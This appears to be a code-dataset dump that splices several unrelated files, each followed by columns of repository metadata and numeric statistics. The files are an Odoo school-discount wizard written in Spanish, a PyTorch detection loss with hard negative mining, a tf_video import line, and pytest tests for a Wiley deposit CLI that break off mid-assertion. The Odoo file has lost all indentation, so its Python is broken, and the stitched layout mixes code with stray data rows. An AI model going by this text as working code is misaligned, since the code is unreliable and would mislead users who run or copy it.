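# Two wizard (TransientModel) classes: "descuento.alumno" holds the
# filter and discount choices, "descuento.alumno.detalle" holds one
# generated line per matching student.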
class DescuentoAlumonsEscuelaDetalle(models.TransientModel):
_name="descuento.alumno.detalle"
_order = "jornada_id,seccion_id,curso_id,paralelo_id"
descuento_id =fields.Many2one('descuento.alumno',string="Relacion")
jornada_id=fields.Many2one('jornada','Jornada',copy=False, index=True)
seccion_id=fields.Many2one('seccion','Sección',copy=False, index=True)
curso_id=fields.Many2one('curso','Curso',copy=False, index=True)
paralelo_id=fields.Many2one('paralelo','Paralelo',copy=False, index=True)
alumno_id=fields.Many2one('res.partner',string="Alumno")
alumno_nombre = fields.Char(related='alumno_id.name',string="Alumno")
representante_id=fields.Many2one('res.partner',string="Representante")
colaborador = fields.Many2one('tipo.colaborador',string="Colaborador")
cant_representados = fields.Integer(string="# de Representados")
descuentos_ids = fields.Many2many('descuentos',string='Descuentos')
aplicar =fields.Boolean(string="Aplicar")
class DescuentoAlumonsEscuela(models.TransientModel):
_name="descuento.alumno"
_rec_name = 'descuento_id'
jornada_id=fields.Many2one('jornada','Jornada',copy=False, index=True)
seccion_id=fields.Many2one('seccion','Sección',copy=False, index=True)
curso_id=fields.Many2one('curso','Curso',copy=False, index=True)
paralelo_id=fields.Many2one('paralelo','Paralelo',copy=False, index=True)
colaborador = fields.Many2one('tipo.colaborador',string="Colaborador")
descuento_id = fields.Many2one('descuentos',string="Descuento")
porcentaje = fields.Float(related='descuento_id.porcentaje',string="Porcentaje")
alumno_id=fields.Many2one('res.partner',string="Alumno",domain="[('tipo','=','H'),('parent_id','=',representante_id)]")
representante_id=fields.Many2one('res.partner',string="Representante")
num_representados = fields.Integer(string="# de Representados")
descuento_line=fields.One2many('descuento.alumno.detalle','descuento_id',string="Relacion")
consulto=fields.Boolean(string="Consulta")
alumno_ids = fields.Many2one(related='alumno_id',string="Alumno",domain="[('tipo','=','H')]")
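# consultar_alumnos rebuilds the detail lines: it wipes
# descuento_alumno_detalle and then runs one res.partner search per
# combination of the optional filters (jornada, seccion, curso,
# paralelo, colaborador, representante, alumno), nesting an if/else
# per filter instead of composing the domain incrementally.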
@api.multi
def consultar_alumnos(self):
self.env.cr.execute("""delete from descuento_alumno_detalle""")
if self.jornada_id:
if self.seccion_id:
if self.curso_id:
if self.paralelo_id:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('paralelo_id','=',self.paralelo_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('curso_id','=',self.curso_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('seccion_id','=',self.seccion_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('jornada_id','=',self.jornada_id.id),
('tipo','!=','C')])
else:
if self.colaborador.id:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('parent_id.colaborador','=',self.colaborador.id),
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('parent_id.colaborador','=',self.colaborador.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
                ('parent_id.colaborador','=',self.colaborador.id),
('tipo','!=','C')])
else:
if self.representante_id:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('parent_id','=',self.representante_id.id),
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('parent_id','=',self.representante_id.id),
('tipo','!=','C')])
else:
if self.alumno_id:
obj_datos=self.env['res.partner'].search([
('id','=',self.alumno_id.id),
('tipo','!=','C')])
else:
obj_datos=self.env['res.partner'].search([
('parent_id','!=',False),
('tipo','!=','C')])
obj_detalle=self.env['descuento.alumno.detalle']
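        # Build one descuento.alumno.detalle line per partner found. Records with
        # a parent are students themselves; records without one are representatives,
        # whose students are looked up and listed instead. When num_representados
        # is set, only families with exactly that many students are kept.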
for datos in obj_datos:
cat_rep = self.env['res.partner'].search([('parent_id','=',datos.parent_id.id)])
dicct={}
lista=[]
if datos.parent_id:
if self.num_representados:
if len(cat_rep)==self.num_representados:
for descuentos in datos.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicct={
'descuento_id':self.id,
'jornada_id':datos.jornada_id.id,
'seccion_id':datos.seccion_id.id,
'curso_id':datos.curso_id.id,
'paralelo_id':datos.paralelo_id.id,
'alumno_id':datos.id,
'representante_id':datos.parent_id.id,
'colaborador':datos.parent_id.colaborador.id,
'cant_representados':len(cat_rep),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicct)
obj_registro.descuentos_ids=lista
else:
for descuentos in datos.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicct={
'descuento_id':self.id,
'jornada_id':datos.jornada_id.id,
'seccion_id':datos.seccion_id.id,
'curso_id':datos.curso_id.id,
'paralelo_id':datos.paralelo_id.id,
'alumno_id':datos.id,
'representante_id':datos.parent_id.id,
'colaborador':datos.parent_id.colaborador.id,
'cant_representados':len(cat_rep),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicct)
obj_registro.descuentos_ids=lista
else:
padres = self.env['res.partner'].search([('parent_id','=',datos.id)])
if self.num_representados:
if len(padres)==self.num_representados:
for dato in padres:
lista=[]
for descuentos in dato.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicc={
'descuento_id':self.id,
'jornada_id':dato.jornada_id.id,
'seccion_id':dato.seccion_id.id,
'curso_id':dato.curso_id.id,
'paralelo_id':dato.paralelo_id.id,
'alumno_id':dato.id,
'representante_id':dato.parent_id.id,
'colaborador':dato.parent_id.colaborador.id,
'cant_representados':len(padres),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicc)
obj_registro.descuentos_ids=lista
else:
for dato in padres:
lista=[]
for descuentos in dato.descuentos_line:
lista.append(descuentos.descuento_id.id)
dicc={
'descuento_id':self.id,
'jornada_id':dato.jornada_id.id,
'seccion_id':dato.seccion_id.id,
'curso_id':dato.curso_id.id,
'paralelo_id':dato.paralelo_id.id,
'alumno_id':dato.id,
'representante_id':dato.parent_id.id,
'colaborador':dato.parent_id.colaborador.id,
'cant_representados':len(padres),
'aplicar':True,
}
obj_registro=obj_detalle.create(dicc)
obj_registro.descuentos_ids=lista
self.consulto=True
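    # Apply the selected discount: create a descuentos.tomar record for every
    # checked line, skipping students that already have one for this discount.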
@api.multi
def aplicar_descuento(self):
for lineas in self.descuento_line:
if lineas.aplicar:
obj_descuento = self.env['descuentos.tomar'].search([('partner_ids','=',lineas.alumno_id.id),('descuento_id','=',self.descuento_id.id)],limit=1)
                if not obj_descuento:
obj_descuento = self.env['descuentos.tomar'].create({
'descuento_id':self.descuento_id.id,
'porcentaje':self.descuento_id.porcentaje,
'partner_ids':lineas.alumno_id.id
})
self.consultar_alumnos()
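    # Undo the discount: drop the descuentos.tomar record of every checked line.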
@api.multi
def des_aplicar_descuento(self):
for lineas in self.descuento_line:
if lineas.aplicar:
obj_descuento = self.env['descuentos.tomar'].search([('partner_ids','=',lineas.alumno_id.id),('descuento_id','=',self.descuento_id.id)],limit=1)
obj_descuento.unlink()
self.consultar_alumnos()
| 69
| 160
| 0.321251
| 2,136
| 31,947
| 4.583333
| 0.044007
| 0.069459
| 0.042901
| 0.072932
| 0.887028
| 0.874566
| 0.855975
| 0.837998
| 0.809806
| 0.809806
| 0
| 0.001649
| 0.563277
| 31,947
| 463
| 161
| 69
| 0.700043
| 0.000657
| 0
| 0.885321
| 0
| 0
| 0.112545
| 0.019201
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002294
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b5e44f8206d88f92a422f0935a4853bca594d841
| 7,746
|
py
|
Python
|
ChasingTrainFramework_GeneralOneClassDetection/loss_layer_farm/loss.py
|
CNN-NISER/lffd-pytorch
|
7d6476ece79cf75c6265c89346ddac48929ce8f6
|
[
"MIT"
] | 220
|
2019-10-14T01:08:46.000Z
|
2022-03-23T06:42:39.000Z
|
ChasingTrainFramework_GeneralOneClassDetection/loss_layer_farm/loss.py
|
CNN-NISER/lffd-pytorch
|
7d6476ece79cf75c6265c89346ddac48929ce8f6
|
[
"MIT"
] | 10
|
2019-10-16T07:40:04.000Z
|
2022-01-26T07:46:14.000Z
|
ChasingTrainFramework_GeneralOneClassDetection/loss_layer_farm/loss.py
|
CNN-NISER/lffd-pytorch
|
7d6476ece79cf75c6265c89346ddac48929ce8f6
|
[
"MIT"
] | 37
|
2019-10-22T01:49:36.000Z
|
2021-11-01T13:50:30.000Z
|
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
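# Losses for a multi-scale one-class detector (LFFD-style). Each scale i
# contributes a 2-channel score map (outputs[2*i]) and a 4-channel bbox map
# (outputs[2*i + 1]); targets interleave a mask tensor and a label tensor per
# scale. Negatives are pruned by online hard negative mining (HNM).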
class cross_entropy_with_hnm_for_one_class_detection2(nn.Module):
def __init__(self, hnm_ratio, num_output_scales):
        super(cross_entropy_with_hnm_for_one_class_detection2, self).__init__()
self.hnm_ratio = int(hnm_ratio)
self.num_output_scales = num_output_scales
def forward(self, outputs, targets):
loss_branch_list = []
for i in range(self.num_output_scales):
pred_score = outputs[i * 2]
pred_bbox = outputs[i * 2 + 1]
gt_mask = targets[i * 2].cuda()
gt_label = targets[i * 2 + 1].cuda()
pred_score_softmax = torch.softmax(pred_score, dim=1)
# loss_mask = torch.ones(pred_score_softmax.shape[0],
# 1,
# pred_score_softmax.shape[2],
# pred_score_softmax.shape[3])
            # boolean mask so the masked indexing below stays valid when hnm_ratio <= 0
            loss_mask = torch.ones(pred_score_softmax.shape, dtype=torch.bool, device=pred_score.device)
if self.hnm_ratio > 0:
# print('gt_label.shape:', gt_label.shape)
# print('gt_label.size():', gt_label.size())
pos_flag = (gt_label[:, 0, :, :] > 0.5)
pos_num = torch.sum(pos_flag) # get num. of positive examples
if pos_num > 0:
neg_flag = (gt_label[:, 1, :, :] > 0.5)
neg_num = torch.sum(neg_flag)
neg_num_selected = min(int(self.hnm_ratio * pos_num), int(neg_num))
                    # neg_prob: predicted background probability at negative locations, zero elsewhere
neg_prob = torch.where(neg_flag, pred_score_softmax[:, 1, :, :], \
torch.zeros_like(pred_score_softmax[:, 1, :, :]))
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
else:
neg_choice_ratio = 0.1
neg_num_selected = int(pred_score_softmax[:, 1, :, :].numel() * neg_choice_ratio)
neg_prob = pred_score_softmax[:, 1, :, :]
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
# cross entropy with mask
pred_score_softmax_masked = pred_score_softmax[loss_mask]
pred_score_log = torch.log(pred_score_softmax_masked)
score_cross_entropy = -gt_label[:, :2, :, :][loss_mask] * pred_score_log
loss_score = torch.sum(score_cross_entropy) / score_cross_entropy.numel()
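            # Bbox regression only where the target mask is on; with no positive
            # locations in the batch the regression term is zero.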
mask_bbox = gt_mask[:, 2:6, :, :]
if torch.sum(mask_bbox) == 0:
loss_bbox = torch.zeros_like(loss_score)
else:
predict_bbox = pred_bbox * mask_bbox
label_bbox = gt_label[:, 2:6, :, :] * mask_bbox
loss_bbox = F.mse_loss(predict_bbox, label_bbox, reduction='mean')
# loss_bbox = F.smooth_l1_loss(predict_bbox, label_bbox, reduction='mean')
# loss_bbox = torch.nn.MSELoss(predict_bbox, label_bbox, size_average=True, reduce=True)
# loss_bbox = torch.nn.SmoothL1Loss(predict_bbox, label_bbox, size_average=True, reduce=True)
loss_branch = loss_score + loss_bbox
loss_branch_list.append(loss_branch)
return loss_branch_list
class cross_entropy_with_hnm_for_one_class_detection(nn.Module):
def __init__(self, hnm_ratio, num_output_scales):
super(cross_entropy_with_hnm_for_one_class_detection, self).__init__()
self.hnm_ratio = int(hnm_ratio)
self.num_output_scales = num_output_scales
def forward(self, outputs, targets):
loss_cls = 0
loss_reg = 0
loss_branch = []
for i in range(self.num_output_scales):
pred_score = outputs[i * 2]
pred_bbox = outputs[i * 2 + 1]
gt_mask = targets[i * 2].cuda()
gt_label = targets[i * 2 + 1].cuda()
pred_score_softmax = torch.softmax(pred_score, dim=1)
# loss_mask = torch.ones(pred_score_softmax.shape[0],
# 1,
# pred_score_softmax.shape[2],
# pred_score_softmax.shape[3])
            # boolean mask so the masked indexing below stays valid when hnm_ratio <= 0
            loss_mask = torch.ones(pred_score_softmax.shape, dtype=torch.bool, device=pred_score.device)
if self.hnm_ratio > 0:
# print('gt_label.shape:', gt_label.shape)
# print('gt_label.size():', gt_label.size())
pos_flag = (gt_label[:, 0, :, :] > 0.5)
pos_num = torch.sum(pos_flag) # get num. of positive examples
if pos_num > 0:
neg_flag = (gt_label[:, 1, :, :] > 0.5)
neg_num = torch.sum(neg_flag)
neg_num_selected = min(int(self.hnm_ratio * pos_num), int(neg_num))
                    # neg_prob: predicted background probability at negative locations, zero elsewhere
neg_prob = torch.where(neg_flag, pred_score_softmax[:, 1, :, :], \
torch.zeros_like(pred_score_softmax[:, 1, :, :]))
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
else:
neg_choice_ratio = 0.1
neg_num_selected = int(pred_score_softmax[:, 1, :, :].numel() * neg_choice_ratio)
neg_prob = pred_score_softmax[:, 1, :, :]
neg_prob_sort, _ = torch.sort(neg_prob.reshape(1, -1), descending=False)
prob_threshold = neg_prob_sort[0][neg_num_selected-1]
neg_grad_flag = (neg_prob <= prob_threshold)
loss_mask = torch.cat([pos_flag.unsqueeze(1), neg_grad_flag.unsqueeze(1)], dim=1)
# cross entropy with mask
pred_score_softmax_masked = pred_score_softmax[loss_mask]
pred_score_log = torch.log(pred_score_softmax_masked)
score_cross_entropy = -gt_label[:, :2, :, :][loss_mask] * pred_score_log
loss_score = torch.sum(score_cross_entropy) / score_cross_entropy.numel()
mask_bbox = gt_mask[:, 2:6, :, :]
if torch.sum(mask_bbox) == 0:
loss_bbox = torch.zeros_like(loss_score)
else:
predict_bbox = pred_bbox * mask_bbox
label_bbox = gt_label[:, 2:6, :, :] * mask_bbox
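                # Unlike the variant above, normalize by the number of active
                # mask elements instead of averaging over every element.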
loss_bbox = F.mse_loss(predict_bbox, label_bbox, reduction='sum') / torch.sum(mask_bbox)
# loss_bbox = F.smooth_l1_loss(predict_bbox, label_bbox, reduction='sum') / torch.sum(mask_bbox)
# loss_bbox = torch.nn.MSELoss(predict_bbox, label_bbox, size_average=False, reduce=True)
# loss_bbox = torch.nn.SmoothL1Loss(predict_bbox, label_bbox, size_average=False, reduce=True)
loss_cls += loss_score
loss_reg += loss_bbox
loss_branch.append(loss_score)
loss_branch.append(loss_bbox)
loss = loss_cls + loss_reg
return loss, loss_branch
| 51.986577
| 112
| 0.565195
| 968
| 7,746
| 4.140496
| 0.105372
| 0.071856
| 0.095808
| 0.041916
| 0.926896
| 0.926896
| 0.926896
| 0.926896
| 0.907186
| 0.90519
| 0
| 0.018803
| 0.327137
| 7,746
| 149
| 113
| 51.986577
| 0.750192
| 0.158404
| 0
| 0.811321
| 0
| 0
| 0.001078
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.028302
| 0
| 0.103774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1fa51ee7b85c5f74c2211c6f46b1fbf6b9e5524a
| 109
|
py
|
Python
|
tf_video/__init__.py
|
jegork/tf-video-preprocessing
|
3f925fe902cf50e75156495d840f34fb0e2f7f5a
|
[
"MIT"
] | 1
|
2022-02-20T22:38:01.000Z
|
2022-02-20T22:38:01.000Z
|
tf_video/__init__.py
|
jegork/tf-video-preprocessing
|
3f925fe902cf50e75156495d840f34fb0e2f7f5a
|
[
"MIT"
] | null | null | null |
tf_video/__init__.py
|
jegork/tf-video-preprocessing
|
3f925fe902cf50e75156495d840f34fb0e2f7f5a
|
[
"MIT"
] | null | null | null |
from .main import VideoRandomZoom, VideoRandomContrast, VideoRandomCrop, VideoRandomFlip, VideoRandomRotation
| 109
| 109
| 0.889908
| 8
| 109
| 12.125
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06422
| 109
| 1
| 109
| 109
| 0.95098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1fa62f63ce644b35eadbf208d95cf3cf17194bd9
| 12,978
|
py
|
Python
|
tests/test_cli.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | 2
|
2022-01-26T15:05:48.000Z
|
2022-01-31T17:28:47.000Z
|
tests/test_cli.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | 10
|
2021-08-03T21:23:39.000Z
|
2022-02-10T15:24:12.000Z
|
tests/test_cli.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | null | null | null |
import logging
import boto3
from moto import mock_dynamodb2, mock_ses, mock_sqs
from awd.cli import cli, doi_to_be_added, doi_to_be_retried
logger = logging.getLogger(__name__)
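# CLI tests for the awd "deposit" and "listen" commands. AWS services are
# mocked with moto; runner, web_mock, s3_mock, sqs_class and the message
# fixtures are assumed to be provided by the suite's conftest.py.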
def test_doi_to_be_added_true():
doi_items = [{"doi": "111.1/111"}]
validation_status = doi_to_be_added("222.2/2222", doi_items)
assert validation_status is True
def test_doi_to_be_added_false():
doi_items = [{"doi": "111.1/1111"}]
validation_status = doi_to_be_added("111.1/1111", doi_items)
assert validation_status is False
def test_doi_to_be_retried_true():
doi_items = [{"doi": "111.1/111", "status": "Failed, will retry"}]
validation_status = doi_to_be_retried("111.1/111", doi_items)
assert validation_status is True
def test_doi_to_be_retried_false():
doi_items = [{"doi": "111.1/111", "status": "Success"}]
validation_status = doi_to_be_retried("111.1/111", doi_items)
assert validation_status is False
@mock_dynamodb2
@mock_ses
@mock_sqs
def test_deposit_success(
caplog, web_mock, s3_mock, s3_class, sqs_class, submission_message_body, runner
):
with caplog.at_level(logging.DEBUG):
sqs = boto3.resource("sqs", region_name="us-east-1")
sqs.create_queue(QueueName="mock-input-queue")
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--doi_table",
"test_dois",
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_success.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"awd",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
uploaded_metadata = s3_class.client.get_object(
Bucket="awd", Key="10.1002-term.3131.json"
)
assert uploaded_metadata["ResponseMetadata"]["HTTPStatusCode"] == 200
uploaded_bitstream = s3_class.client.get_object(
Bucket="awd", Key="10.1002-term.3131.pdf"
)
assert uploaded_bitstream["ResponseMetadata"]["HTTPStatusCode"] == 200
messages = sqs_class.receive(
"https://queue.amazonaws.com/123456789012/", "mock-input-queue"
)
for message in messages:
assert message["Body"] == submission_message_body
assert "Submission process has completed" in caplog.text
assert "Logs sent to" in caplog.text
@mock_dynamodb2
@mock_ses
def test_deposit_insufficient_metadata(caplog, web_mock, s3_mock, s3_class, runner):
with caplog.at_level(logging.DEBUG):
ses_client = boto3.client("ses", region_name="us-east-1")
ses_client.verify_email_identity(EmailAddress="noreply@example.com")
dynamodb = boto3.client("dynamodb", region_name="us-east-1")
dynamodb.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
result = runner.invoke(
cli,
[
"--doi_table",
"test_dois",
"--sqs_base_url",
"https://queue.amazonaws.com/123456789012/",
"--sqs_output_queue",
"mock-output-queue",
"--log_source_email",
"noreply@example.com",
"--log_recipient_email",
"mock@mock.mock",
"deposit",
"--doi_file_path",
"tests/fixtures/doi_insufficient_metadata.csv",
"--metadata_url",
"http://example.com/works/",
"--content_url",
"http://example.com/doi/",
"--bucket",
"awd",
"--sqs_input_queue",
"mock-input-queue",
"--collection_handle",
"123.4/5678",
],
)
assert result.exit_code == 0
assert (
